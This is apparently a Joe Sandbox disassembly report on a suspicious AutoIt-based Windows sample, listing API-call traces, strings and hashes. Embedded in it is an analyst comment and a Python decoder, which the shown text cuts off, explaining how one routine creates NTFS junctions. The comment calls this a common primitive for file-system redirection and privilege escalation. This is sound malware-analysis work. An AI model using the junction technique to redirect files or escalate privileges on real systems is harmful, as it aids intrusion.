                                                                        • Instruction ID: 9e0e3b0e3763a4a1ff11b119f4a779c1de548e76272f1557691f86c415f0a548
                                                                        • Opcode Fuzzy Hash: 1cabb711630f031d45f0a756bdca93b30cb6b881bcb86d4d060fcac1f5a4faac
                                                                        • Instruction Fuzzy Hash: C631C031A4421CA6DB14EB68ED43FEDB3B8AF62314F200168F641B10D5FB51AB4486A2
                                                                        APIs
                                                                        • LoadIconW.USER32(00000063), ref: 0092EAB0
                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0092EAC2
                                                                        • SetWindowTextW.USER32(?,?), ref: 0092EAD9
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0092EAEE
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0092EAF4
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0092EB04
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0092EB0A
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0092EB2B
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0092EB45
                                                                        • GetWindowRect.USER32(?,?), ref: 0092EB4E
                                                                        • SetWindowTextW.USER32(?,?), ref: 0092EBB9
                                                                        • GetDesktopWindow.USER32 ref: 0092EBBF
                                                                        • GetWindowRect.USER32(00000000), ref: 0092EBC6
                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0092EC12
                                                                        • GetClientRect.USER32(?,?), ref: 0092EC1F
                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0092EC44
                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0092EC6F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                        • String ID:
                                                                        • API String ID: 3869813825-0
                                                                        • Opcode ID: efadf5c58600f0ba840cfc3b4e4d240331edde04ef480f1d8f590631f4681932
                                                                        • Instruction ID: 89ab5ed003bbe550034ba29cb350e08a78b03129740407ba367358df001f527c
                                                                        • Opcode Fuzzy Hash: efadf5c58600f0ba840cfc3b4e4d240331edde04ef480f1d8f590631f4681932
                                                                        • Instruction Fuzzy Hash: 29517A71900709AFDB20DFA9DD89F6EBBF9FF44705F004928E686A26A4C774A944DB10
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 009479C6
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 009479D1
                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 009479DC
                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 009479E7
                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 009479F2
                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 009479FD
                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00947A08
                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00947A13
                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00947A1E
                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00947A29
                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00947A34
                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00947A3F
                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00947A4A
                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00947A55
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00947A60
                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00947A6B
                                                                        • GetCursorInfo.USER32(?), ref: 00947A7B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$Load$Info
                                                                        • String ID:
                                                                        • API String ID: 2577412497-0
                                                                        • Opcode ID: 7e8f8f5c77c6122b6cb99b2be077c694f2e9953183033c482937893275054f05
                                                                        • Instruction ID: a27033d6e77cf7ed65967620702b318f6d17f1fb09873ea4b8ff7a77be0ba4c5
                                                                        • Opcode Fuzzy Hash: 7e8f8f5c77c6122b6cb99b2be077c694f2e9953183033c482937893275054f05
                                                                        • Instruction Fuzzy Hash: FF31E1B1D4831E6ADB109FB68C8995FFEE8FF04750F50492AA50DA7280DB78A5008FA1
                                                                        APIs
                                                                          • Part of subcall function 0090E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008FC8B7,?,00002000,?,?,00000000,?,008F419E,?,?,?,0098DC00), ref: 0090E984
                                                                          • Part of subcall function 008F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F53B1,?,?,008F61FF,?,00000000,00000001,00000000), ref: 008F662F
                                                                        • __wsplitpath.LIBCMT ref: 008FC93E
                                                                          • Part of subcall function 00911DFC: __wsplitpath_helper.LIBCMT ref: 00911E3C
                                                                        • _wcscpy.LIBCMT ref: 008FC953
                                                                        • _wcscat.LIBCMT ref: 008FC968
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 008FC978
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FCABE
                                                                          • Part of subcall function 008FB337: _wcscpy.LIBCMT ref: 008FB36F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                        • API String ID: 2258743419-1018226102
                                                                        • Opcode ID: 75a4df2bc06d361c226b528a8eac92d0c6c20ee72d06fde894e0269f550a301a
                                                                        • Instruction ID: 074286e63a1e1e7d72aa87d855a82329ae1be90c4eda668cae055d7fa29a83ba
                                                                        • Opcode Fuzzy Hash: 75a4df2bc06d361c226b528a8eac92d0c6c20ee72d06fde894e0269f550a301a
                                                                        • Instruction Fuzzy Hash: 261278715083499FC724EF28C991AAFBBE4FFC9314F40491EF589932A1DB309A49CB52
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0095CEFB
                                                                        • DestroyWindow.USER32(?,?), ref: 0095CF73
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0095CFF4
                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0095D016
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095D025
                                                                        • DestroyWindow.USER32(?), ref: 0095D042
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008F0000,00000000), ref: 0095D075
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095D094
                                                                        • GetDesktopWindow.USER32 ref: 0095D0A9
                                                                        • GetWindowRect.USER32(00000000), ref: 0095D0B0
                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0095D0C2
                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0095D0DA
                                                                          • Part of subcall function 0090B526: GetWindowLongW.USER32(?,000000EB), ref: 0090B537
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                        • String ID: 0$tooltips_class32
                                                                        • API String ID: 3877571568-3619404913
                                                                        • Opcode ID: 42f3b0355876ffadc1419f834b4727ba8d61116efa00652526ea6636a7e79604
                                                                        • Instruction ID: 1bc57289274606eed8da6f433550d1e33559632e197170983bc131d53cf620c6
                                                                        • Opcode Fuzzy Hash: 42f3b0355876ffadc1419f834b4727ba8d61116efa00652526ea6636a7e79604
                                                                        • Instruction Fuzzy Hash: D471DCB1255305AFDB20CF28CC84FA637E9EB88704F54461DFD858B2A1D770E846DB62
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • DragQueryPoint.SHELL32(?,?), ref: 0095F37A
                                                                          • Part of subcall function 0095D7DE: ClientToScreen.USER32(?,?), ref: 0095D807
                                                                          • Part of subcall function 0095D7DE: GetWindowRect.USER32(?,?), ref: 0095D87D
                                                                          • Part of subcall function 0095D7DE: PtInRect.USER32(?,?,0095ED5A), ref: 0095D88D
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0095F3E3
                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0095F3EE
                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0095F411
                                                                        • _wcscat.LIBCMT ref: 0095F441
                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0095F458
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0095F471
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0095F488
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0095F4AA
                                                                        • DragFinish.SHELL32(?), ref: 0095F4B1
                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0095F59C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                        • API String ID: 169749273-3440237614
                                                                        • Opcode ID: ed716304a2eb3b4045577e732548e195d2e3b3c0c106b40da75a154ac8ed4dcc
                                                                        • Instruction ID: 866b8d756e3cf8af2e45b9aae71109dee0324dc8a0c15087df45d6fef83d354a
                                                                        • Opcode Fuzzy Hash: ed716304a2eb3b4045577e732548e195d2e3b3c0c106b40da75a154ac8ed4dcc
                                                                        • Instruction Fuzzy Hash: 3A612A72108304AFC711EF64CC49EABBBF8FFC9724F400A1EB695921A1DB709649CB52
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(00000000), ref: 0093AB3D
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0093AB46
                                                                        • VariantClear.OLEAUT32(?), ref: 0093AB52
                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0093AC40
                                                                        • __swprintf.LIBCMT ref: 0093AC70
                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 0093AC9C
                                                                        • VariantInit.OLEAUT32(?), ref: 0093AD4D
                                                                        • SysFreeString.OLEAUT32(00000016), ref: 0093ADDF
                                                                        • VariantClear.OLEAUT32(?), ref: 0093AE35
                                                                        • VariantClear.OLEAUT32(?), ref: 0093AE44
                                                                        • VariantInit.OLEAUT32(00000000), ref: 0093AE80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                        • API String ID: 3730832054-3931177956
                                                                        • Opcode ID: 3598726d08494362048e89aea3fec1d9b3479d2fba72232798db06134376e387
                                                                        • Instruction ID: 86229e970c67c1c0177a3244192af6284b8b7406a13c6239be116d4b5f4e15e3
                                                                        • Opcode Fuzzy Hash: 3598726d08494362048e89aea3fec1d9b3479d2fba72232798db06134376e387
                                                                        • Instruction Fuzzy Hash: 8BD1EE71A04219EFDB20AF65C885B6AF7B9FF44700F148855E4859B1E0DB78ED80DFA2
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 009571FC
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00957247
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                        • API String ID: 3974292440-4258414348
                                                                        • Opcode ID: 9b595a5528c8a5cb3ba774b2aabc046b4160645439895f4eb5da64b866f512a4
                                                                        • Instruction ID: a40acaf21f2e5e7f1846633d229608698a64010930c6f32155270b5ca337fce4
                                                                        • Opcode Fuzzy Hash: 9b595a5528c8a5cb3ba774b2aabc046b4160645439895f4eb5da64b866f512a4
                                                                        • Instruction Fuzzy Hash: 3D914C742087119FCB04EF65D441A6EB7A6BF94310F00485CFD966B3A2DB75EE0ACB82
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0095E5AB
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0095BEAF), ref: 0095E607
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0095E647
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0095E68C
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0095E6C3
                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0095BEAF), ref: 0095E6CF
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0095E6DF
                                                                        • DestroyIcon.USER32(?,?,?,?,?,0095BEAF), ref: 0095E6EE
                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0095E70B
                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0095E717
                                                                          • Part of subcall function 00910FA7: __wcsicmp_l.LIBCMT ref: 00911030
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                        • String ID: .dll$.exe$.icl
                                                                        • API String ID: 1212759294-1154884017
                                                                        • Opcode ID: c8f2ee0debf647474c020701549f3577baa27cb3ce3c17489c07d4e6f72ea779
                                                                        • Instruction ID: a83c3a57322541880b775ccd6b674a85d573776110ed8ec185e369b6486c3dce
                                                                        • Opcode Fuzzy Hash: c8f2ee0debf647474c020701549f3577baa27cb3ce3c17489c07d4e6f72ea779
                                                                        • Instruction Fuzzy Hash: D361EF71600219BAEB18DF65CC46FFE77ACBF08765F104105F915E61D0EBB2AA84CBA0
                                                                        APIs
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • CharLowerBuffW.USER32(?,?), ref: 0093D292
                                                                        • GetDriveTypeW.KERNEL32 ref: 0093D2DF
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093D327
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093D35E
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093D38C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                        • API String ID: 1148790751-4113822522
                                                                        • Opcode ID: 855107963270a60cf35cd21daac07c9c2b2699008c8f233cf4cf975b15ca3804
                                                                        • Instruction ID: 38f67ab5e66513473356c5b76c7eee9172bda66358013716d3f650bc326b9c0b
                                                                        • Opcode Fuzzy Hash: 855107963270a60cf35cd21daac07c9c2b2699008c8f233cf4cf975b15ca3804
                                                                        • Instruction Fuzzy Hash: 49515C715043189FC700EF24D99196AB3F8FF88718F00885CF995A7291DB31EE05CB82
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00963973,00000016,0000138C,00000016,?,00000016,0098DDB4,00000000,?), ref: 009326F1
                                                                        • LoadStringW.USER32(00000000,?,00963973,00000016), ref: 009326FA
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00963973,00000016,0000138C,00000016,?,00000016,0098DDB4,00000000,?,00000016), ref: 0093271C
                                                                        • LoadStringW.USER32(00000000,?,00963973,00000016), ref: 0093271F
                                                                        • __swprintf.LIBCMT ref: 0093276F
                                                                        • __swprintf.LIBCMT ref: 00932780
                                                                        • _wprintf.LIBCMT ref: 00932829
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00932840
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                        • API String ID: 618562835-2268648507
                                                                        • Opcode ID: a59208affc3aa2bb08db6226f6c62a396e4811b9464aafc90afd6222fd3e87a0
                                                                        • Instruction ID: 8de3cf4989358254c366d4b0806a8de475e650f2e27fec461c984655c4a189d8
                                                                        • Opcode Fuzzy Hash: a59208affc3aa2bb08db6226f6c62a396e4811b9464aafc90afd6222fd3e87a0
                                                                        • Instruction Fuzzy Hash: 3E413B7280021DAACB14FBE4DE86EFEB778FF55344F100065B601B6092EA206F49DBA1
                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0093D0D8
                                                                        • __swprintf.LIBCMT ref: 0093D0FA
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0093D137
                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0093D15C
                                                                        • _memset.LIBCMT ref: 0093D17B
                                                                        • _wcsncpy.LIBCMT ref: 0093D1B7
                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0093D1EC
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0093D1F7
                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0093D200
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0093D20A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                        • String ID: :$\$\??\%s
                                                                        • API String ID: 2733774712-3457252023
                                                                        • Opcode ID: fd5be6c4c450dd146fa568e9ade9e3a42ad2d1815ce879078048552a18d6e923
                                                                        • Instruction ID: c4126064c7bb1bfa0a6e55980d043c13062c920219130d00b15e8fb20da767ae
                                                                        • Opcode Fuzzy Hash: fd5be6c4c450dd146fa568e9ade9e3a42ad2d1815ce879078048552a18d6e923
                                                                        • Instruction Fuzzy Hash: BF31AFB2A14109ABDB21DFA0DC49FEB37BDEF89700F1040B6F519D21A1E77096858F64
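                                                                        The call sequence in the block above is the textbook way of creating a directory junction: CreateDirectoryW makes an empty directory, CreateFileW opens it with GENERIC_WRITE (0x40000000), OPEN_EXISTING (3) and flags 0x02200000 (FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, the combination required to open a directory handle and to act on the reparse point rather than follow it), and DeviceIoControl issues control code 0x000900A4, which decodes to FSCTL_SET_REPARSE_POINT, with the target formatted as the NT path "\??\%s". RemoveDirectoryW on the failure path cleans up if the reparse data could not be set. Together with the AutoIt-style error strings in the block at 0093276F above, this is most plausibly the AutoIt runtime's FileCreateNTFSLink implementation (a junction for directories); that attribution is an inference, not something the report states. Junction creation is worth flagging in a trace because it is a common primitive for file-system redirection and privilege-escalation chains. The following Python decoder is an added example and not part of the Joe Sandbox report: it parses API lines in the report's own "Name.MODULE(args), ref: addr" layout and decodes the CreateFileW and DeviceIoControl constants, so an analyst can recognise this pattern for any CreateFileW/DeviceIoControl line in the report without a header lookup. The two sample lines are copied from the block above; the CTL_CODE field layout and constant values are those of the Windows SDK headers (winioctl.h, winnt.h).

```python
"""Decode the hex arguments Joe Sandbox prints for CreateFileW and DeviceIoControl.

Added example; it is not part of the sandbox report or of the analysed binary.
Sample input: the two API lines from the report block above, copied verbatim.
"""
import re

# Constructed sample: the report's own lines for this function, unchanged.
SAMPLE_LINES = [
    "• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0093D15C",
    "• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0093D1EC",
]

# Joe Sandbox layout: "<Api>.<MODULE>(<hex args>), ref: <address>".
API_RE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")

# CreateFileW argument tables (values from winnt.h / fileapi.h).
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
         0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
         0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
         0x40000000: "FILE_FLAG_OVERLAPPED"}

# CTL_CODE(DeviceType, Function, Method, Access) fields from winioctl.h.
DEVICE_TYPES = {0x09: "FILE_DEVICE_FILE_SYSTEM"}
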